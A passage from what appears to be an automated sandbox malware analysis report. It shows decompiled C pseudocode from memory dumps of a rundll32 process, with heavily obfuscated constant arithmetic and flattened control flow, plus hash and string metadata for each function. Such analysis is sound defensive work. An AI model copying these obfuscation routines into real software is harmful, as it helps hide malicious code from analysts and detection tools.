                                                                                                                      				_v200 = 0x1d77da;
                                                                                                                      				_t214 = 0x6b;
                                                                                                                      				_v200 = _v200 / _t214;
                                                                                                                      				_t215 = 9;
                                                                                                                      				_v200 = _v200 / _t215;
                                                                                                                      				_t216 = 0x59;
                                                                                                                      				_v200 = _v200 / _t216;
                                                                                                                      				_v200 = _v200 ^ 0x00052bad;
                                                                                                                      				_v184 = 0x474669;
                                                                                                                      				_v184 = _v184 * 0x25;
                                                                                                                      				_v184 = _v184 + 0xffff8141;
                                                                                                                      				_v184 = _v184 ^ 0x0a4cf000;
                                                                                                                      				_v160 = 0x98ddfb;
                                                                                                                      				_v160 = _v160 << 3;
                                                                                                                      				_v160 = _v160 ^ 0x04cf55b1;
                                                                                                                      				_v152 = 0xbbc225;
                                                                                                                      				_v152 = _v152 * 0x58;
                                                                                                                      				_v152 = _v152 ^ 0x408ec409;
                                                                                                                      				while(_t183 != 0x4a2a3c4) {
                                                                                                                      					if(_t183 == 0x640e5f9) {
                                                                                                                      						__eflags = _v128;
                                                                                                                      						_t189 =  &_v128;
                                                                                                                      						while(__eflags != 0) {
                                                                                                                      							_t178 =  *_t189;
                                                                                                                      							__eflags = _t178 - 0x30;
                                                                                                                      							if(_t178 < 0x30) {
                                                                                                                      								L10:
                                                                                                                      								__eflags = _t178 - 0x61;
                                                                                                                      								if(_t178 < 0x61) {
                                                                                                                      									L12:
                                                                                                                      									__eflags = _t178 - 0x41;
                                                                                                                      									if(_t178 < 0x41) {
                                                                                                                      										L14:
                                                                                                                      										 *_t189 = 0x58;
                                                                                                                      									} else {
                                                                                                                      										__eflags = _t178 - 0x5a;
                                                                                                                      										if(_t178 > 0x5a) {
                                                                                                                      											goto L14;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									__eflags = _t178 - 0x7a;
                                                                                                                      									if(_t178 > 0x7a) {
                                                                                                                      										goto L12;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								__eflags = _t178 - 0x39;
                                                                                                                      								if(_t178 > 0x39) {
                                                                                                                      									goto L10;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							_t189 = _t189 + 1;
                                                                                                                      							__eflags =  *_t189;
                                                                                                                      						}
                                                                                                                      						_t183 = 0x4a2a3c4;
                                                                                                                      						continue;
                                                                                                                      					} else {
                                                                                                                      						if(_t183 == 0x7562914) {
                                                                                                                      							_v144 = 0x80;
                                                                                                                      							_t178 = E0068CD29(_v164,  &_v144, _v176,  &_v128);
                                                                                                                      							_t220 =  &(_t220[3]);
                                                                                                                      							_t183 = 0x640e5f9;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t183 == 0xf669bfa) {
                                                                                                                      								_t183 = 0x7562914;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					L18:
                                                                                                                      					__eflags = _t183 - 0x1718ff4;
                                                                                                                      					if(__eflags != 0) {
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					return _t178;
                                                                                                                      				}
                                                                                                                      				_push(_v172);
                                                                                                                      				_push(_v156);
                                                                                                                      				_push(_v204);
                                                                                                                      				_t174 = E00698606(_v148, 0x681690, __eflags);
                                                                                                                      				E00682206( &_v128, _t209, _v196, _v200, _t174, E0068EE81(__eflags), _v184);
                                                                                                                      				_t178 = E0068A8B0(_v160, _t174, _v152);
                                                                                                                      				_t220 =  &(_t220[0xb]);
                                                                                                                      				_t183 = 0x1718ff4;
                                                                                                                      				goto L18;
                                                                                                                      			}






































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *&B$YX.$eP)s$iFG${So
                                                                                                                      • API String ID: 0-3810143839
                                                                                                                      • Opcode ID: fc93487f58cb5629a84373729fe90670aff1b3859adcda8fe4f62a981c416fb3
                                                                                                                      • Instruction ID: 4dab2f15be812e6386fa4c4bdcb6ba9748ce3e556d518ae05f530539e97460ac
                                                                                                                      • Opcode Fuzzy Hash: fc93487f58cb5629a84373729fe90670aff1b3859adcda8fe4f62a981c416fb3
                                                                                                                      • Instruction Fuzzy Hash: 9381A8715093419FD794CF25D588A5BBBE2BBC5B18F00591DF18586260D3B4CA4ACF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E00687735(void* __edx, intOrPtr _a4, signed int* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                      				char _v44;
                                                                                                                      				void* _v56;
                                                                                                                      				intOrPtr _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				unsigned int _v112;
                                                                                                                      				unsigned int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				void* __ecx;
                                                                                                                      				void* _t163;
                                                                                                                      				signed int _t176;
                                                                                                                      				void* _t188;
                                                                                                                      				signed int _t205;
                                                                                                                      				signed int* _t207;
                                                                                                                      				void* _t209;
                                                                                                                      				void* _t210;
                                                                                                                      
                                                                                                                      				_t186 = _a4;
                                                                                                                      				_t207 = _a8;
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_t207);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				E006920B9(_t163);
                                                                                                                      				_v60 = 0x524796;
                                                                                                                      				_t210 = _t209 + 0x18;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t188 = 0x9c25eae;
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				_v76 = 0x29f01;
                                                                                                                      				_v76 = _v76 | 0x94be009d;
                                                                                                                      				_v76 = _v76 ^ 0x94be9f9d;
                                                                                                                      				_v108 = 0xafa956;
                                                                                                                      				_v108 = _v108 + 0x628;
                                                                                                                      				_v108 = _v108 ^ 0xf539d3de;
                                                                                                                      				_v108 = _v108 ^ 0xf5927b2e;
                                                                                                                      				_v92 = 0x300c11;
                                                                                                                      				_v92 = _v92 ^ 0x95f7d427;
                                                                                                                      				_v92 = _v92 ^ 0x95c19bc8;
                                                                                                                      				_v116 = 0x7fd72e;
                                                                                                                      				_v116 = _v116 >> 0x10;
                                                                                                                      				_v116 = _v116 + 0x5d9b;
                                                                                                                      				_v116 = _v116 ^ 0x0001fda4;
                                                                                                                      				_v88 = 0x25a82f;
                                                                                                                      				_t205 = 0x1b;
                                                                                                                      				_v88 = _v88 * 0x72;
                                                                                                                      				_v88 = _v88 ^ 0x10cad58f;
                                                                                                                      				_v100 = 0xf91ce5;
                                                                                                                      				_v100 = _v100 >> 0xc;
                                                                                                                      				_v100 = _v100 ^ 0x71d91e41;
                                                                                                                      				_v100 = _v100 ^ 0x71d9c87d;
                                                                                                                      				_v136 = 0x5a524;
                                                                                                                      				_v136 = _v136 ^ 0x65d544fc;
                                                                                                                      				_v136 = _v136 / _t205;
                                                                                                                      				_v136 = _v136 + 0xdad4;
                                                                                                                      				_v136 = _v136 ^ 0x03c43220;
                                                                                                                      				_v68 = 0xd5537a;
                                                                                                                      				_v68 = _v68 + 0xffffd52f;
                                                                                                                      				_v68 = _v68 ^ 0x00d2b66c;
                                                                                                                      				_v128 = 0x59397b;
                                                                                                                      				_v128 = _v128 ^ 0x5dfc0cc3;
                                                                                                                      				_v128 = _v128 + 0x56f6;
                                                                                                                      				_v128 = _v128 + 0xff83;
                                                                                                                      				_v128 = _v128 ^ 0x5dafd3d4;
                                                                                                                      				_v104 = 0x85edfa;
                                                                                                                      				_v104 = _v104 | 0x32b3baf7;
                                                                                                                      				_v104 = _v104 ^ 0x32b12396;
                                                                                                                      				_v112 = 0x4c4fc6;
                                                                                                                      				_v112 = _v112 + 0xbf9f;
                                                                                                                      				_v112 = _v112 >> 1;
                                                                                                                      				_v112 = _v112 ^ 0x002f2047;
                                                                                                                      				_v120 = 0xc21a43;
                                                                                                                      				_v120 = _v120 | 0x0781619f;
                                                                                                                      				_v120 = _v120 ^ 0x30a197e6;
                                                                                                                      				_v120 = _v120 ^ 0x376a3e6d;
                                                                                                                      				_v84 = 0xaf6a80;
                                                                                                                      				_v84 = _v84 + 0xffff12f3;
                                                                                                                      				_v84 = _v84 ^ 0x00ae6f5f;
                                                                                                                      				_v64 = 0x7bdfb0;
                                                                                                                      				_v64 = _v64 >> 2;
                                                                                                                      				_v64 = _v64 ^ 0x00114c08;
                                                                                                                      				_v96 = 0x6b35de;
                                                                                                                      				_v96 = _v96 * 0x60;
                                                                                                                      				_v96 = _v96 ^ 0x283b6418;
                                                                                                                      				_v124 = 0x52b9d2;
                                                                                                                      				_v124 = _v124 | 0x40c5122c;
                                                                                                                      				_v124 = _v124 << 8;
                                                                                                                      				_v124 = _v124 >> 0x10;
                                                                                                                      				_v124 = _v124 ^ 0x0001910d;
                                                                                                                      				_v132 = 0x44d0f9;
                                                                                                                      				_v132 = _v132 * 0x29;
                                                                                                                      				_v132 = _v132 + 0xf17;
                                                                                                                      				_v132 = _v132 * 0x65;
                                                                                                                      				_v132 = _v132 ^ 0x592f3fb2;
                                                                                                                      				_v72 = 0xc75ad6;
                                                                                                                      				_v72 = _v72 ^ 0xe0bef3a1;
                                                                                                                      				_v72 = _v72 ^ 0xe072572c;
                                                                                                                      				_v80 = 0xa6c1d6;
                                                                                                                      				_v80 = _v80 + 0xc8d;
                                                                                                                      				_v80 = _v80 ^ 0x00ac29a9;
                                                                                                                      				do {
                                                                                                                      					while(_t188 != 0xe27b71) {
                                                                                                                      						if(_t188 == 0x372e88b) {
                                                                                                                      							_push(_t188);
                                                                                                                      							_push(_t188);
                                                                                                                      							_t176 = E00687FF2(_t207[1]);
                                                                                                                      							 *_t207 = _t176;
                                                                                                                      							__eflags = _t176;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								_t188 = 0xe27b71;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t188 == 0x93f98fe) {
                                                                                                                      								_t207[1] = E006A0C14(_t186);
                                                                                                                      								_t188 = 0x372e88b;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t188 == 0x9c25eae) {
                                                                                                                      									_t188 = 0x93f98fe;
                                                                                                                      									 *_t207 =  *_t207 & 0x00000000;
                                                                                                                      									_t207[1] = _v76;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t188 == 0xa0c9f29) {
                                                                                                                      										_t146 =  &_v112; // 0x2f2047
                                                                                                                      										E00690DAF(_v68,  &_v44, _v128,  *((intOrPtr*)(_t186 + 0x48)), _v104,  *_t146);
                                                                                                                      										_t210 = _t210 + 0x10;
                                                                                                                      										_t188 = 0xc7f60b3;
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      										if(_t188 == 0xc7f60b3) {
                                                                                                                      											_t144 =  &_v84; // 0xe072572c
                                                                                                                      											E006A0E3A( &_v44, _v120, __eflags,  *_t144, _v64, _v96, _t186 + 0x14);
                                                                                                                      											_t210 = _t210 + 0x10;
                                                                                                                      											_t188 = 0xcf8cba1;
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											_t219 = _t188 - 0xcf8cba1;
                                                                                                                      											if(_t188 != 0xcf8cba1) {
                                                                                                                      												goto L17;
                                                                                                                      											} else {
                                                                                                                      												E006A0E3A( &_v44, _v124, _t219, _v132, _v72, _v80, _t186 + 0x38);
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L9:
                                                                                                                      						return 0 |  *_t207 != 0x00000000;
                                                                                                                      					}
                                                                                                                      					E00683DBC( &_v44, _t207, _v88, _v100, _v136);
                                                                                                                      					_t210 = _t210 + 0xc;
                                                                                                                      					_t188 = 0xa0c9f29;
                                                                                                                      					L17:
                                                                                                                      					__eflags = _t188 - 0x560a718;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L9;
                                                                                                                      			}

































                                                                                                                      0x006879bd
                                                                                                                      0x00687aac
                                                                                                                      0x00687aad
                                                                                                                      0x00687aae
                                                                                                                      0x00687ab3
                                                                                                                      0x00687ab7
                                                                                                                      0x00687ab9
                                                                                                                      0x00687abf
                                                                                                                      0x00000000
                                                                                                                      0x00687abf
                                                                                                                      0x006879c3
                                                                                                                      0x006879c5
                                                                                                                      0x00687a90
                                                                                                                      0x00687a93
                                                                                                                      0x00000000
                                                                                                                      0x006879cb
                                                                                                                      0x006879d1
                                                                                                                      0x00687a7c
                                                                                                                      0x00687a7e
                                                                                                                      0x00687a81
                                                                                                                      0x00000000
                                                                                                                      0x006879d7
                                                                                                                      0x006879dd
                                                                                                                      0x00687a4f
                                                                                                                      0x00687a66
                                                                                                                      0x00687a6b
                                                                                                                      0x00687a6e
                                                                                                                      0x00000000
                                                                                                                      0x006879df
                                                                                                                      0x006879e5
                                                                                                                      0x00687a35
                                                                                                                      0x00687a3d
                                                                                                                      0x00687a42
                                                                                                                      0x00687a45
                                                                                                                      0x00000000
                                                                                                                      0x006879e7
                                                                                                                      0x006879e7
                                                                                                                      0x006879ed
                                                                                                                      0x00000000
                                                                                                                      0x006879f3
                                                                                                                      0x00687a0b
                                                                                                                      0x00687a10
                                                                                                                      0x006879ed
                                                                                                                      0x006879e5
                                                                                                                      0x006879dd
                                                                                                                      0x006879d1
                                                                                                                      0x006879c5
                                                                                                                      0x00687a13
                                                                                                                      0x00687a24
                                                                                                                      0x00687a24
                                                                                                                      0x00687ad8
                                                                                                                      0x00687add
                                                                                                                      0x00687ae0
                                                                                                                      0x00687ae5
                                                                                                                      0x00687ae5
                                                                                                                      0x00687ae5
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ,Wr$G /$m>j7$q{${9Y
                                                                                                                      • API String ID: 0-2956538602
                                                                                                                      • Opcode ID: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
                                                                                                                      • Instruction ID: fa89491163c855f638f5ceaa2b84626705cebbd25d0d47cf6c6184ca813450a1
                                                                                                                      • Opcode Fuzzy Hash: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
                                                                                                                      • Instruction Fuzzy Hash: A4913E710093419FD7A8DF65D58692BBBE2FBC4748F209A1CF29296220D3B5CA498F43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E00684816(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                      				signed int _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				char _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				void* _t164;
                                                                                                                      				void* _t179;
                                                                                                                      				signed int _t190;
                                                                                                                      				signed int _t191;
                                                                                                                      				signed int _t192;
                                                                                                                      				signed int _t193;
                                                                                                                      				void* _t196;
                                                                                                                      				void* _t213;
                                                                                                                      				void* _t214;
                                                                                                                      				signed int* _t217;
                                                                                                                      
                                                                                                                      				_push(_a16);
                                                                                                                      				_t213 = __edx;
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t164);
                                                                                                                      				_v4 = _v4 & 0x00000000;
                                                                                                                      				_t217 =  &(( &_v88)[6]);
                                                                                                                      				_v16 = 0xc0a747;
                                                                                                                      				_v12 = 0xade381;
                                                                                                                      				_t214 = 0;
                                                                                                                      				_v8 = 0x11050f;
                                                                                                                      				_t196 = 0x5adc597;
                                                                                                                      				_v84 = 0xdf9e69;
                                                                                                                      				_v84 = _v84 >> 2;
                                                                                                                      				_v84 = _v84 + 0xffff5795;
                                                                                                                      				_v84 = _v84 >> 5;
                                                                                                                      				_v84 = _v84 ^ 0x0001b9f8;
                                                                                                                      				_v68 = 0xf2d8cd;
                                                                                                                      				_v68 = _v68 << 6;
                                                                                                                      				_v68 = _v68 | 0xe3b79c6a;
                                                                                                                      				_v68 = _v68 + 0xec5a;
                                                                                                                      				_v68 = _v68 ^ 0xffb8abc5;
                                                                                                                      				_v40 = 0x5d8c34;
                                                                                                                      				_v40 = _v40 >> 9;
                                                                                                                      				_v40 = _v40 ^ 0x40002ec6;
                                                                                                                      				_v28 = 0x37ca39;
                                                                                                                      				_v28 = _v28 | 0x456668c2;
                                                                                                                      				_v28 = _v28 ^ 0x0577eafb;
                                                                                                                      				_v80 = 0xd16358;
                                                                                                                      				_v80 = _v80 ^ 0xe637ce9d;
                                                                                                                      				_t190 = 0x68;
                                                                                                                      				_v80 = _v80 * 0x4b;
                                                                                                                      				_v80 = _v80 << 2;
                                                                                                                      				_v80 = _v80 ^ 0x965c2e63;
                                                                                                                      				_v56 = 0xfc1806;
                                                                                                                      				_v56 = _v56 + 0xffffb57d;
                                                                                                                      				_v56 = _v56 | 0x299c1b97;
                                                                                                                      				_v56 = _v56 ^ 0x29fc2736;
                                                                                                                      				_v44 = 0x81586;
                                                                                                                      				_v44 = _v44 | 0xba5390c4;
                                                                                                                      				_v44 = _v44 ^ 0xba584850;
                                                                                                                      				_v60 = 0x52e6aa;
                                                                                                                      				_v60 = _v60 >> 0xa;
                                                                                                                      				_v60 = _v60 * 0x28;
                                                                                                                      				_v60 = _v60 ^ 0x00066c4e;
                                                                                                                      				_v48 = 0x7a334;
                                                                                                                      				_v48 = _v48 + 0xfffff5af;
                                                                                                                      				_v48 = _v48 ^ 0x0009652d;
                                                                                                                      				_v52 = 0x3bf8e8;
                                                                                                                      				_v52 = _v52 / _t190;
                                                                                                                      				_v52 = _v52 ^ 0x00025bcb;
                                                                                                                      				_v64 = 0xacc490;
                                                                                                                      				_t191 = 0x6f;
                                                                                                                      				_v64 = _v64 / _t191;
                                                                                                                      				_v64 = _v64 ^ 0xce7acdce;
                                                                                                                      				_v64 = _v64 ^ 0xce756fa5;
                                                                                                                      				_v88 = 0x557b83;
                                                                                                                      				_v88 = _v88 ^ 0xfc4fd146;
                                                                                                                      				_v88 = _v88 ^ 0x87bb4e9a;
                                                                                                                      				_v88 = _v88 ^ 0x18fbc6ce;
                                                                                                                      				_v88 = _v88 ^ 0x635c68ef;
                                                                                                                      				_v24 = 0xa24557;
                                                                                                                      				_t192 = 0x23;
                                                                                                                      				_v24 = _v24 / _t192;
                                                                                                                      				_v24 = _v24 ^ 0x00019ec3;
                                                                                                                      				_v72 = 0x274d3f;
                                                                                                                      				_v72 = _v72 + 0x3236;
                                                                                                                      				_v72 = _v72 + 0x71a1;
                                                                                                                      				_v72 = _v72 + 0x1749;
                                                                                                                      				_v72 = _v72 ^ 0x0028bc49;
                                                                                                                      				_v32 = 0x96c762;
                                                                                                                      				_t193 = 0x44;
                                                                                                                      				_v32 = _v32 / _t193;
                                                                                                                      				_v32 = _v32 ^ 0x000b5918;
                                                                                                                      				_v76 = 0x2f082c;
                                                                                                                      				_v76 = _v76 + 0x52f3;
                                                                                                                      				_v76 = _v76 + 0x7ae4;
                                                                                                                      				_v76 = _v76 ^ 0x81d2744f;
                                                                                                                      				_v76 = _v76 ^ 0x81f68fa5;
                                                                                                                      				_v36 = 0x9357ce;
                                                                                                                      				_v36 = _v36 + 0xfffffb26;
                                                                                                                      				_v36 = _v36 ^ 0x009b03e6;
                                                                                                                      				do {
                                                                                                                      					while(_t196 != 0x4d42949) {
                                                                                                                      						if(_t196 == 0x5adc597) {
                                                                                                                      							_t196 = 0x4d42949;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t196 == 0x78e32ab) {
                                                                                                                      								E0069847F(_v24, _t213, _v28 | _v68, _v72, _a8, _v32, _t214, _v76, _v36,  &_v20);
                                                                                                                      							} else {
                                                                                                                      								if(_t196 != 0xf2775cd) {
                                                                                                                      									goto L11;
                                                                                                                      								} else {
                                                                                                                      									_push(_t196);
                                                                                                                      									_push(_t196);
                                                                                                                      									_t214 = E00687FF2(_v20 + _v20);
                                                                                                                      									if(_t214 != 0) {
                                                                                                                      										_t196 = 0x78e32ab;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L14:
                                                                                                                      						return _t214;
                                                                                                                      					}
                                                                                                                      					_t179 = E0069847F(_v80, _t213, _v40 | _v84, _v56, _a8, _v44, 0, _v60, _v48,  &_v20);
                                                                                                                      					_t217 =  &(_t217[8]);
                                                                                                                      					if(_t179 == 0) {
                                                                                                                      						_t196 = 0xc32537b;
                                                                                                                      						goto L11;
                                                                                                                      					} else {
                                                                                                                      						_t196 = 0xf2775cd;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L14;
                                                                                                                      					L11:
                                                                                                                      				} while (_t196 != 0xc32537b);
                                                                                                                      				goto L14;
                                                                                                                      			}




































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: -e$62$?M'$h\c$z
                                                                                                                      • API String ID: 0-1842174784
                                                                                                                      • Opcode ID: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
                                                                                                                      • Instruction ID: ab440dd356f85c883050a918f333ba01c0b0892ce4f239f630462a102046dd99
                                                                                                                      • Opcode Fuzzy Hash: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
                                                                                                                      • Instruction Fuzzy Hash: 5A812E715093819FD7A8CF61D58991BBBF2FBC9758F408A0CF29586260D7B6CA08CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0069BE27(intOrPtr* __ecx) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				char _v320;
                                                                                                                      				char _t133;
                                                                                                                      				signed int _t136;
                                                                                                                      				void* _t139;
                                                                                                                      				signed int _t141;
                                                                                                                      				signed int _t142;
                                                                                                                      				signed int _t143;
                                                                                                                      				char* _t144;
                                                                                                                      				intOrPtr* _t163;
                                                                                                                      				void* _t164;
                                                                                                                      
                                                                                                                      				_v40 = 0x365269;
                                                                                                                      				_v40 = _v40 >> 7;
                                                                                                                      				_v40 = _v40 ^ 0x00099806;
                                                                                                                      				_v16 = 0x620947;
                                                                                                                      				_v16 = _v16 + 0x25da;
                                                                                                                      				_v16 = _v16 | 0xf0dff1a3;
                                                                                                                      				_v16 = _v16 + 0xffff8fd5;
                                                                                                                      				_v16 = _v16 ^ 0xf0f65193;
                                                                                                                      				_v60 = 0x4a6911;
                                                                                                                      				_v60 = _v60 >> 2;
                                                                                                                      				_v60 = _v60 ^ 0x0015bfec;
                                                                                                                      				_v32 = 0xee641f;
                                                                                                                      				_v32 = _v32 ^ 0x54466854;
                                                                                                                      				_v32 = _v32 ^ 0x51df3278;
                                                                                                                      				_v32 = _v32 ^ 0x057124b2;
                                                                                                                      				_v36 = 0x2245a1;
                                                                                                                      				_t163 = __ecx;
                                                                                                                      				_t141 = 0x59;
                                                                                                                      				_v36 = _v36 / _t141;
                                                                                                                      				_t142 = 0x7c;
                                                                                                                      				_v36 = _v36 / _t142;
                                                                                                                      				_v36 = _v36 ^ 0x00022b59;
                                                                                                                      				_v52 = 0x17e728;
                                                                                                                      				_v52 = _v52 << 7;
                                                                                                                      				_v52 = _v52 ^ 0x0bfefc33;
                                                                                                                      				_v24 = 0x5a7c12;
                                                                                                                      				_v24 = _v24 + 0xffff6a30;
                                                                                                                      				_v24 = _v24 + 0xb9bd;
                                                                                                                      				_v24 = _v24 ^ 0x00522d4c;
                                                                                                                      				_v8 = 0x70b293;
                                                                                                                      				_v8 = _v8 ^ 0xb7f64013;
                                                                                                                      				_v8 = _v8 | 0x98950303;
                                                                                                                      				_v8 = _v8 << 0x10;
                                                                                                                      				_v8 = _v8 ^ 0xf38d6f21;
                                                                                                                      				_v28 = 0x5e48e6;
                                                                                                                      				_v28 = _v28 >> 2;
                                                                                                                      				_v28 = _v28 << 0xf;
                                                                                                                      				_v28 = _v28 ^ 0xc917f664;
                                                                                                                      				_v44 = 0xd34be4;
                                                                                                                      				_v44 = _v44 ^ 0x1af04c78;
                                                                                                                      				_v44 = _v44 ^ 0x1a25cf5b;
                                                                                                                      				_v56 = 0x13a2c8;
                                                                                                                      				_v56 = _v56 ^ 0x00107e6c;
                                                                                                                      				_v20 = 0x6acc1;
                                                                                                                      				_t143 = 0x48;
                                                                                                                      				_v20 = _v20 * 0x75;
                                                                                                                      				_v20 = _v20 | 0x5ce04716;
                                                                                                                      				_v20 = _v20 ^ 0xfe39b07b;
                                                                                                                      				_v20 = _v20 ^ 0xa1d6ae77;
                                                                                                                      				_v48 = 0x9d30cb;
                                                                                                                      				_t144 =  &_v320;
                                                                                                                      				_v48 = _v48 / _t143;
                                                                                                                      				_v48 = _v48 ^ 0x00028c5d;
                                                                                                                      				_v12 = 0x456efe;
                                                                                                                      				_v12 = _v12 + 0xffff4082;
                                                                                                                      				_v12 = _v12 >> 1;
                                                                                                                      				_v12 = _v12 ^ 0xdbb5e427;
                                                                                                                      				_v12 = _v12 ^ 0xdb99f5c8;
                                                                                                                      				while(1) {
                                                                                                                      					_t133 =  *_t163;
                                                                                                                      					if(_t133 == 0) {
                                                                                                                      						break;
                                                                                                                      					}
                                                                                                                      					if(_t133 == 0x2e) {
                                                                                                                      						 *_t144 = 0;
                                                                                                                      					} else {
                                                                                                                      						 *_t144 = _t133;
                                                                                                                      						_t144 = _t144 + 1;
                                                                                                                      						_t163 = _t163 + 1;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					L6:
                                                                                                                      					_t164 = E0068ADE6(_v40, _v16,  &_v320, _v60);
                                                                                                                      					if(_t164 != 0) {
                                                                                                                      						L8:
                                                                                                                      						_t136 = E0069DBEA(_t163 + 1, _v8, _v28, _v44);
                                                                                                                      						_push(_v12);
                                                                                                                      						_push(_t136 ^ 0x2ac2611c);
                                                                                                                      						_push(_v48);
                                                                                                                      						_push(_t164);
                                                                                                                      						return E0068CDCD(_v56, _v20);
                                                                                                                      					}
                                                                                                                      					_t139 = E0069CADF(_v32,  &_v320, _v36, _v52);
                                                                                                                      					_t164 = _t139;
                                                                                                                      					if(_t164 != 0) {
                                                                                                                      						goto L8;
                                                                                                                      					}
                                                                                                                      					return _t139;
                                                                                                                      				}
                                                                                                                      				goto L6;
                                                                                                                      			}




























                                                                                                                      Strings
